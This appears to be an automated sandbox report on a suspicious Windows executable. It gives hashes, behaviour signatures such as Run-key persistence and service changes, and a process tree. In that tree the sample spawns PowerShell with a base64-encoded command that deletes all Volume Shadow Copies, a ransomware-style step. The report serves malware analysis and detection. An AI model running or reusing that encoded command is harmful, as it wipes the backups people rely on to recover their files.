Analysis

  • max time kernel
    147s
  • max time network
    10s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    20-10-2020 09:45

General

  • Target

    e9e5459e32521a8ca1c075a96d3358337919321f5d149fe3a8cc5f6f57b33923.exe

  • Size

    115KB

  • MD5

    0800618cde0d124c6616ef384fbe1434

  • SHA1

    9404f15917b9a216242063d1b7759d891bf11314

  • SHA256

    e9e5459e32521a8ca1c075a96d3358337919321f5d149fe3a8cc5f6f57b33923

  • SHA512

    0dbedc86f146716a394af812e63e6b721c37cf1f49da07ac35d2106495b19a5f473344ab90a026e84441c4d0741c3b21ba1815616886ce692d6b6f03b0a45703

Score
6/10

Malware Config

Signatures

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Modifies service 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e9e5459e32521a8ca1c075a96d3358337919321f5d149fe3a8cc5f6f57b33923.exe
    "C:\Users\Admin\AppData\Local\Temp\e9e5459e32521a8ca1c075a96d3358337919321f5d149fe3a8cc5f6f57b33923.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1264
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1916
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1944
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Modifies service
      • Suspicious use of AdjustPrivilegeToken
      PID:452

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1916-0-0x0000000000000000-mapping.dmp
    • memory/1916-1-0x000007FEF5830000-0x000007FEF621C000-memory.dmp
      Filesize

      9.9MB

    • memory/1916-2-0x00000000024F0000-0x00000000024F1000-memory.dmp
      Filesize

      4KB

    • memory/1916-3-0x000000001AB60000-0x000000001AB61000-memory.dmp
      Filesize

      4KB

    • memory/1916-4-0x0000000002620000-0x0000000002621000-memory.dmp
      Filesize

      4KB

    • memory/1916-5-0x000000001AA40000-0x000000001AA41000-memory.dmp
      Filesize

      4KB

    • memory/1916-6-0x000000001B4D0000-0x000000001B4D1000-memory.dmp
      Filesize

      4KB